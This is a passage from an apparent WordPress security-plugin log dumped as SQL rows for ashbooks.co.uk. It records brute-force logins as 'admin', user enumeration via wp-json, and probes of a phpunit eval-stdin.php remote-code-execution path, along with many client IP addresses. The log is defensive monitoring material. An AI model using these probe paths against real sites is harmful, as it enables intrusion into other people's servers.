',0,1636628940.9135,50,'hdCFNr4fpc0BHwS9bUiYatjq','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628940.9329,50,'9LwrdpJXEAMO8cBZbC0Fuj1h','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628941.0998,50,'Uv4b6Zg3i1OdfDztIyPMAes0','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628941.1137,50,'OaMjcz5PXJA21TEYU6Wgwuks','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628941.6710,50,'K3EzA74kpacguSO8rM2FVUP6','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628941.6788,50,'gC73b0GTSaApsB1i4v8yFDHt','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628941.6566,50,'xJFyKQ1CgIkWtqfjSwTpd3AO','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628941.9385,50,'U7aXcizRMjglGhnqfZW0OA4F','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628942.0480,50,'NbGuRH5D98Qlhyrgt6ez4koX','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628942.1198,50,'sVnc8fyRKuawxbEmWNT70JAt','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628942.1368,50,'rQjufMDVL0sKUxgtZlOhSdHP','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628942.5715,50,'FOIntZUBTJdwsc4KRL8CG6Se','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628942.6424,50,'3OTjISdmQUEbBafYWyezDrPp','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628942.9454,50,'y7ExbUFXLVdlOAonahPYQ8Nk','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628942.9747,50,'k6ip5L0ZN8toWAUqTRbfOQIY','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628943.0372,50,'s2bulLoDJ5Kd9Q1q0OpSxfPV','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628943.0556,50,'eSzyUx6h09RKABoCPdwImntr','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628943.1279,50,'edRmqIS6WO7J5ojsfnvylBA4','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628943.8079,50,'DtLkGZ87VPQC01oWeFwXNBqu','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628943.9680,50,'cf1bv2J7o0hGsVFw8XmajUeH','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628944.1912,50,'op0IgNL8dyUSZHW4vODFPn9G','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628944.5231,50,'UaHkz6sjRBGftrEIbNJX8Ce5','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628944.5394,50,'HK7eTtQXwxAjlC1qhPnN6kZ3','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628944.6186,50,'S5pGPiwBqVj8MYDasL43X6AT','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628944.6215,50,'6E1gPCqKUB0Fv28JtmWQRYSb','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628944.7052,50,'x9dP7fhaADRCEHimYlv0y4bN','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628944.7936,50,'wheIimSxtHLuT7OqfBrZ80R4','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628944.9261,50,'ZL3fbmg7M0qpyQVYoTFJxG1K','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628945.1079,50,'2eOUf4WG9Tamdjqyc6Npo8wL','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628945.4067,50,'JEH0cihVR4WYZwLF9yAtkjlT','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628945.4397,50,'MAihaqy4rIKHU7ecFsvRNblQ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('103.149.154.8',1737857544,'admin',0,1636628987.6332,7,'btkgGCKwVjpO7x2TJlYAEoB0','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.197.12.140',2328169612,'admin',0,1636629729.0909,7,'DgzWsqT6bLweko091A5OfFNY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('195.67.74.174',3275967150,'admin',0,1636630432.1339,7,'Wfw9leULyN5jIZqEHVY8Fbki','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('139.59.118.238',2335930094,'admin',0,1636631182.2269,7,'5l9hQ1KJrOLIA4GcfSzCD8MN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('122.128.106.186',2055236282,'admin',0,1636631986.2416,7,'giBWJUn8w3TLZ2ECFX0qR7Nz','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.99.138.106',2808318570,'admin',0,1636633716.9767,7,'eETialtsncLvXdN0DbrWzyB8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636636592.1082,51,'ZdHIlFu9aEJoTvOQk6qzn2yt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.114.144.40',2809303080,'admin',0,1636636649.7209,7,'qfNYkXwp2aF71GKcvlyW0rd5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('93.114.185.218',1567799770,'admin',0,1636638570.0325,7,'v0Fs1G8BhbWRjcktO5mlxH6q','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('13.229.113.179',233140659,'',0,1636641691.4597,70,'iG8BME2kuznyqH967xSZsRV3','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('13.229.113.179',233140659,'admin',0,1636641696.3208,7,'0Ud4TkwOqWAYjtXnlJK3roQF','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('35.198.137.137',600213897,'',0,1636645997.0090,70,'zNV1SX84ogecRhb0273Um6as','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('5.188.62.76',96222796,'ashbooks',0,1636647207.6320,51,'FsgeKkui360UNIrb482LO9Vp','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('150.136.39.104',2525505384,'',0,1636648167.4710,70,'xmdDEoaOUXWJN1Ic2itM0fwY','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('150.136.39.104',2525505384,'',0,1636648232.6972,70,'fBDeNaxvsugir5RHwVzod846','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('5.188.62.76',96222796,'ashbooks',0,1636657832.1311,51,'CHMaDYrghQUlpoxibAzq6jmP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('193.23.3.40',3239510824,'',0,1636661876.0607,55,'ocYfzA7naj2N6PybvU1OKeGl','','19|0|0|0|ashbooks.co.uk/about.php'),('193.23.3.40',3239510824,'',0,1636662731.4011,55,'ONVpjay5lIf6YsozvKXukceW','','19|0|0|0|www.ashbooks.co.uk/about.php'),('5.188.62.76',96222796,'ashbooks',0,1636668465.4145,51,'QZo8dVPrkLjzGROW1wDM9uiJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636679091.2155,51,'fFRKPrvUQpOakLCYN20dxSnV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.100.66.131',2808365699,'',0,1636679959.5835,55,'hny0FSkvMwc1VLtli2XoeqBI','','19|0|0|0|www.ashbooks.co.uk/rss.php'),('88.135.37.49',1485251889,'admin',0,1636686389.4913,152,'CXnHqOubUG1e4BRmTapskAtW','','0|0|0|0|ashbooks.co.uk/xmlrpc.php'),('5.188.62.76',96222796,'ashbooks',0,1636689689.0691,51,'abR6ZqYBVG8395tHlur7MJ4d','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('18.117.186.188',309705404,'',0,1636699634.3196,55,'syxiVLE0CXoW8QzbRcO5DBvJ','','19|0|0|0|ashbooks.co.uk/blog/wp-login.php'),('18.117.186.188',309705404,'',0,1636699634.3196,55,'9u7H4cvLeiAbyKqhNRlwM5jW','','19|0|0|0|ashbooks.co.uk/wordpress/wp-login.php'),('18.117.186.188',309705404,'',0,1636699634.3196,55,'rxjuatMofH7qkGciL9h8RsXA','','19|0|0|0|ashbooks.co.uk/wp/wp-login.php'),('114.119.131.90',1920435034,'',0,1636710801.8309,55,'Whc5AXJe7ay2jdnrtNBzO6sL','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('194.58.88.114',3258603634,'',0,1636715813.4196,70,'pF34PVesb6H2RuDfXniQtj58','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('89.207.146.189',1506775741,'admin',0,1636721674.3767,7,'oGrXUy5c2PMVOft3Ev9R6pAZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.205',1364735181,'admin',0,1636722106.0501,7,'unIBmRVZAOiM3E2wcHWXk806','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('54.163.195.110',916702062,'admin',0,1636722597.6323,7,'v4jFueCoUrBtcSJaxV8X3iD0','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.238.223.38',1508826918,'admin',0,1636723175.5009,7,'b2mYVBxo5UdQseTH0lMCcqKv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('206.189.23.28',3468498716,'admin',0,1636723977.5201,7,'xXpEyd5MZKOuieLYFRSHvc74','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('64.111.126.32',1081048608,'admin',0,1636724967.1305,7,'qvW0nJYCFmgjfLthxyITakcH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.83.32.182',55779510,'',0,1636726210.0066,55,'0IyuncoHhRfgCLa2ZSWbj537','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/666.php'),('3.83.32.182',55779510,'',0,1636726210.9475,55,'5zQwqtkdSBc3eM6sD7Uh0WPf','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/666.php'),('3.83.32.182',55779510,'',0,1636726211.8437,55,'Q2HNfx4vuJqSTZD38kb1OzER','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/666.php'),('3.83.32.182',55779510,'',0,1636726212.7423,55,'90NYvtol5w1TjrMshWXA6yqI','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/666.php'),('67.205.12.218',1137511642,'admin',0,1636729505.9488,7,'mIEcM5S6iWO19VfXNaAZKQCb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.55.85.219',2721535451,'',0,1636733307.1131,55,'kKNJj7U86TDSbh4u5CVP0nzF','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('143.198.179.234',2412164074,'admin',0,1636734544.7048,7,'zNoYgwuLBT92RPZ5xdvEWI8e','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('206.189.6.60',3468494396,'admin',0,1636735621.3333,7,'ixCsjv7waEczNrYT6LFIp1eU','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.154.85.100',1754944868,'admin',0,1636736345.1122,7,'sXP56ptfEWaUYnO8DizvTujL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.63.173.50',3107958066,'admin',0,1636737054.0978,7,'30yJ75EBZwcreSsa4VhKIRXO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.163.163.120',1168352120,'admin',0,1636737691.5818,7,'heB2DPxT7nmobjVX6vAgkcNU','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.106',1364735082,'admin',0,1636738316.7374,7,'WhTGJHvZk0Itbs3ujdDw5RNP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.26',1364735002,'admin',0,1636739715.1109,7,'5lrvVgTSR0skXh6LnjifIHbz','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.238.223.38',1508826918,'admin',0,1636740402.9254,7,'cltgeNAmdSDLCa5vbP9W7nk6','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.163.224.119',1168367735,'admin',0,1636741074.2825,7,'Rkno6rDUNQIcVqF5OSu3pTWi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.129.89.239',578902511,'admin',0,1636741738.8937,7,'K1hTAa5V73cEonRNWsOUlpqS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('46.63.80.162',775901346,'admin',0,1636742420.6633,7,'Zj6T2GOVEIqMkin3PWlrF9xo','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.131.97',1920435041,'',0,1636742473.3485,55,'VSmDfUxuRKrCGYzMX8hJjpqQ','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('148.72.207.163',2487799715,'admin',0,1636743235.1255,7,'V5uYCf8wlxkSTJzZcWgXb0UF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('220.132.196.5',3699688453,'admin',0,1636743993.9228,7,'jVGp07u3Br89R1kcfd6ACiyz','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.144.126.104',2727378536,'admin',0,1636744738.6726,7,'EyUxO4sTaYdieuPAG7IlkZnV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.28.37.180',1729897908,'admin',0,1636746168.5149,7,'fWC02tHYeO18ib5vjM9sGPVu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('47.242.19.52',804393780,'admin',0,1636746859.2337,7,'sGPRjxQOoDqtpKT0WgrmLXhv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.180.73.192',1806977472,'admin',0,1636747542.6936,7,'ZLGwHNIzhmYid5CTVSp4Agcl','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('195.201.42.236',3284740844,'admin',0,1636748223.0146,7,'KWglzRbik53YDJx7NFSjXVC4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('156.38.216.210',2619791570,'admin',0,1636748899.9356,7,'OUcqnD7GfEBjoyg5bFhp6JmX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.231.60.198',2917612742,'',0,1636749554.5384,55,'XVjINtKJw7EcoRgkaHLDSG8Y','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636749554.9117,55,'uByEYhmzdijr5IAwUNe39QM0','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('187.51.127.28',3140714268,'admin',0,1636749571.8906,7,'Da5pgiWYhcn287HF4mIodErV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.231.60.198',2917612742,'',0,1636749573.7454,55,'H4aQSh1YLUTtFRvq5w6VN7oB','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636750034.3929,55,'JNWySVxEv4nfLj2X5Z6HRq7I','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636750047.9882,55,'TdEtVMarkOyDBe5vAlIH38ZW','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636750048.0098,10,'TdEtVMarkOyDBe5vAlIH38ZW','','707|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636750064.4680,55,'OAovq1f90d6wkDnX4Hj5egmE','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636750079.1941,55,'QlBqCUV7ijb3Swtp9nmHfvDM','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636750101.2366,55,'xG7N5Yd9EqfKm0gkBhlonUIT','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('45.120.69.121',762856825,'admin',0,1636750214.4896,7,'zW8JV67PALxgbZnjf3BCOHMp','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.231.60.198',2917612742,'',0,1636750469.5929,55,'my1uBxRDAhSqLY9vabogZ2WQ','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636750482.9964,55,'P526Yr74RIpjzhfZKvTwEoai','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('173.231.60.198',2917612742,'',0,1636750555.4380,55,'gdc52TRSHKfZbVB7sGeLxQyk','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('195.201.7.148',3284731796,'admin',0,1636750899.6210,7,'Uv37uc04MnpBgEaosGdkyh9r','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.202.172.247',1389014263,'admin',0,1636751525.0519,7,'JN4RLDPldU2vzZuHVj0mrfQb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.202.172.247',1389014263,'admin',0,1636752139.4240,7,'0JcrPYkOMiFpwvGjxsBq4TfI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('195.201.42.236',3284740844,'admin',0,1636753912.7024,7,'ZbsVmapW3JnSLXK5l2NG4zfu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.45.207.95',86888287,'',0,1636754327.0573,55,'GNrX79EA6xb2ZT8qCFhd5Ks4','','19|0|0|0|ashbooks.co.uk/weblog/index.php'),('116.203.150.71',1959499335,'admin',0,1636754469.3202,7,'cQstbleBgDPmwWxY186Rqdpv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('158.69.63.179',2655338419,'admin',0,1636755033.6824,7,'QxuDSHgEvKahekolf4msILqj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.238.223.38',1508826918,'admin',0,1636755621.9299,7,'nt8KfD2QyidE09p4THuvcXzk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.61.146.49',2956825137,'admin',0,1636756156.1997,7,'ob1U9YWirwNlB52xjnG7AThO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.131.90',1920435034,'',0,1636756628.6677,55,'GLjU6MCNZapu9Keyc4tYmBb2','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('13.94.249.188',224328124,'admin',0,1636756718.9170,7,'afkVec3QNhWp1ZGCiszoMxgD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.61.146.49',2956825137,'admin',0,1636757297.4652,7,'LhVrb8QM0WvEwAURfC4dSZpK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.94.120.151',392067223,'admin',0,1636757892.4287,7,'B2avsVSTjI5C1kW4Xgo6Ndze','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.163',1364735139,'admin',0,1636758536.2475,7,'vjIpA9itrELbeMgRXVfTkGBZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.132.10',1920435210,'',0,1636758809.9674,55,'5muHX7kOGyxNTvE8r49LaqQJ','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('145.239.30.120',2448367224,'admin',0,1636759201.1464,7,'n2bW1DMHmVPNTl7Fszg30epj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('35.175.221.160',598728096,'admin',0,1636759852.0683,7,'ni8SLvChtEA0VT2xNc1OpMUR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('72.167.53.106',1218917738,'admin',0,1636761124.6334,7,'w3UV4hcW0ykERH6CjmdDufJN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('128.199.230.82',2160584274,'admin',0,1636761825.4392,7,'p4yEQ6vVxkjYoeTKPDmXLJ2B','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('72.14.176.248',1208922360,'admin',0,1636762489.1472,7,'gwoWLuR0XmF4qEIVdQMeTOly','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.9.154.222',50961118,'admin',0,1636763189.8837,7,'K9UTRwWdYzvuEtiMHkDpSrqy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('195.201.7.148',3284731796,'admin',0,1636763877.7354,7,'UipFdb1kIjgx69GHReJYlBvZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.216.221.91',1608047963,'admin',0,1636764556.9893,7,'LDYnw1c4uHZ3vkqFh7pIeSbj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.172.219.253',1806490621,'admin',0,1636765237.3395,7,'tYgmNzs6ku9UWSPcJXje1Epq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('84.112.89.42',1416649002,'admin',0,1636765925.3340,7,'KpaMs52fZ6to4q8xLNGmgi03','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('74.208.34.142',1255154318,'admin',0,1636766651.8808,7,'Z97wPRpWDyIVFH3ziafrqu5h','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('194.58.88.114',3258603634,'',0,1636767032.1516,70,'Uk20NHQSJetOcgXWIrGYn8Bx','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('194.233.72.23',3270068247,'admin',0,1636767555.9339,7,'RiCuYXDAz6qZQVtESGLlgrwj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('169.60.78.94',2839301726,'admin',0,1636769638.6019,7,'3z5KruDkbV1ihB4ANQmUev6p','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.97.205.210',392285650,'admin',0,1636770862.2967,7,'kGMtxv57WK4dyzQHTYc9Z0N3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.168.97.89',1839751513,'admin',0,1636772044.7607,7,'lbkSA4aPRuCtXdWZhKHY7m6g','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.26',1364735002,'admin',0,1636773201.7774,7,'1HOEDlNL76WvcYPRj3wuFh4n','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('177.55.111.11',2973200139,'admin',0,1636774370.6975,7,'LOtoZJ3xqU1vwBsHnP2jGXly','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.110.251',2650107643,'admin',0,1636777387.5639,7,'3keGEWZPMO0Y48mCshyuBSXQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('136.144.210.23',2291192343,'admin',0,1636777898.8717,7,'dhfkAXQDsMxg6ol1P0yEwVFO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('78.47.116.216',1311732952,'admin',0,1636778407.9055,7,'XqeLagDTnlMprHEdJtUOIzvi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.143',757638799,'admin',0,1636778912.5769,7,'HQ4OqemNE5VvDkiSJwtRWaz9','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('212.51.178.42',3560157738,'admin',0,1636790912.2461,7,'xoZaF5JWkUMs68ITSrplctev','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.2.4.44',3103917100,'admin',0,1636792109.2384,7,'dVzbg1EkpclF0jvhPC475rsX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('207.244.80.28',3488895004,'',0,1636792348.3650,55,'Qeg7m6kNc81hySjVblzZG4X3','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('95.111.197.125',1601160573,'admin',0,1636792730.3484,7,'eAJK23UCxbmz70dWpnhjBwPL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('87.106.169.145',1466608017,'admin',0,1636793393.1417,7,'BetLw5E3bMINfFQ6OC1q8YyT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('118.27.30.151',1981488791,'admin',0,1636794041.3837,7,'SYpI3OH0bi9w5QGLjJ2Dydum','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('190.45.171.165',3190664101,'admin',0,1636794657.5268,7,'jZf6KLsiyOnzC0YdBaRpr48e','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('74.208.34.142',1255154318,'admin',0,1636795280.7968,7,'Q6zX2YlgR09Oue1yWSxp4jP8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('18.196.46.253',314846973,'admin',0,1636795930.3086,7,'LKCvOVBDtA5rPjIlQTYE9q3n','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('37.139.13.163',629869987,'admin',0,1636796590.4416,7,'ZDq56ozl3BVLtrQ2P0v7IbjK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.129.89.239',578902511,'admin',0,1636797237.0529,7,'aU4JR6H3hvcs1lVmfuytGC8p','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.50.199.194',3107112898,'admin',0,1636798691.6969,7,'EFApL3WTSosQxhuDRmcKeXNr','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('2.56.59.242',37239794,'',0,1636800759.4003,70,'JiEe15wnbDFqXBlmhzIdx9Oj','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('67.205.11.6',1137511174,'admin',0,1636802868.3502,7,'w4SzV1ytDUkPXOHTQvNhc7KY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.248.233.244',1761143284,'admin',0,1636803669.3445,7,'dcOuyeMR0VpBhTvGwUq78boD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('93.115.79.153',1567838105,'admin',0,1636806082.5374,7,'nuakQKfoyibtB89EvSsCj2W7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.68.248.47',2319775791,'admin',0,1636806931.6927,7,'Ck2sDm0AunPRZoecBTEfavgd','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('54.163.195.110',916702062,'admin',0,1636807774.2738,7,'iI7GLmfrTjVY0wHkBOAQo4Uv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('93.115.79.153',1567838105,'admin',0,1636808562.1402,7,'gyWGpksh8RYjVwe0AML2KDJt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('169.60.78.94',2839301726,'admin',0,1636809292.3564,7,'14DJQ2KzFlfPqMdmZBAejhRU','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('54.38.181.202',908506570,'admin',0,1636809892.9131,7,'NgSdbxeEI89DqBXkvcwWlHV2','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.217.144.72',1608093768,'admin',0,1636810535.3911,7,'T48Vu0cIxAi1KeySqdaZbNpP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('189.126.106.250',3179178746,'admin',0,1636811200.6453,7,'kxr6AoJIdSHCgWc3DYaBqZGv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.238.223.38',1508826918,'admin',0,1636811789.3149,7,'xeYcKwzbup4sBd1UqomAWHCS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('190.45.171.165',3190664101,'admin',0,1636812394.0113,7,'NrAH2BESlGIsPeMRimtUT5J3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('67.227.155.85',1138989909,'admin',0,1636813577.9428,7,'Qz0nRI8TFBHVxoSuh1PcJ6Xl','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('199.116.78.158',3346288286,'admin',0,1636814194.8086,7,'gruk1HjbdARh2OJXwfGzU8Fn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('94.130.216.182',1585633462,'',0,1636814312.3525,55,'N10xJcnbs6VuED4SraldQR32','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('94.130.216.182',1585633462,'',0,1636814323.3001,55,'4PKO3Cfur2AkdIpSyMqVR708','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('94.130.216.182',1585633462,'',0,1636814369.9421,55,'dxlb9HrBwD6P3V2ohtNfzmk8','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('192.99.231.139',3227772811,'admin',0,1636814761.0428,7,'1jEsfd4IqebZRDtM9gBATpW3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('122.170.98.32',2057986592,'admin',0,1636815359.7103,7,'VhdzW89IM3BTvL4aqRe5KxpA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('208.109.54.127',3496818303,'admin',0,1636815930.1152,7,'Si1PCqGpsBad0OMNZLcrFnvR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.92.58.160',576469664,'admin',0,1636816484.4260,7,'Z49IcBoEXVg7pJT30LmlkDqu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.236.172.180',2917969076,'admin',0,1636816990.1585,7,'IUWj1aVHscnyl9fPx6btpmCe','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.2.4.44',3103917100,'admin',0,1636817523.3601,7,'1rCcNSjoGqkHzDPAWwaTQvIi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.236.145.137',2917962121,'admin',0,1636818743.2177,7,'djgltPicJGbefTU9O6owEpHK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('121.43.170.78',2032904782,'admin',0,1636819380.7959,7,'KbSZWu1CmtwOxvLlR5XEGedP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('202.172.26.53',3400276533,'admin',0,1636820011.0090,7,'J2nv7yMXpdo4lTcbEIjRa93W','','0|0|0|0|ashbooks.co.uk/wp-